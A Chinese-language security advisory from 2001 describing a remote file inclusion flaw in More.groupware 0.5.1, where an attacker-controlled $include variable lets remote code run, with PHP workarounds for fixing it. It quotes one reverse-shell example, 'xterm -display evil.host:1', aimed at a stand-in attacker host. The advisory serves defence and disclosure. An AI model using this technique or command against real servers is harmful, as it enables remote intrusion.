Marc Logemann More.groupware存在任意命令可执行漏洞发布时间:2001-10-05 更新时间:2001-10-05 严重程度:高 威胁程度:普通用户访问权限 错误类型:访问验证错误 利用方式:服务器模式 受影响系统 Marc Logemann More.groupware 0.5.1详细描述 Marc Logemann More.groupware是免费开放源代码的PHP程序,允许用户通过WEB接口在线合作。 其中在More.groupware中存在一个漏洞可以导致远程攻击者在目标系统上以WEB用户身份执行任意命令,原因是远程用户可以提供任意数据给$include变量,此变量可以用来指定一包含PHP代码的文件并被执行,这样导致有影响的脚本重定向执行存在与外部主机上的任意代码。 最终导致上载文件,执行程序,开启反向SHELL(如 "xterm -display evil.host:1")等。。 测试代码 见描述 解决方案 临时解决方法: 1)给included php-files一文件名并不能被WEB用户执行。 2)把所有included php-code放到docroot目录之外,使用文件权限或者.htaccess. 3) 使用定值,在main.php: define("MAINFILE", true); define("CONFIGDIR", "/some/path/"); include('./some_function.inc'); in some_function.inc: if ( !defined("MAINFILE") ) die ("this is a include file!"); include(CONFIGDIR . "config.inc"); 如果你从客户端设置全局变量,它们将不会妨碍这些定值。 4)使用$HTTP_*_VARS和在client端关闭全局变量。 相关信息 |
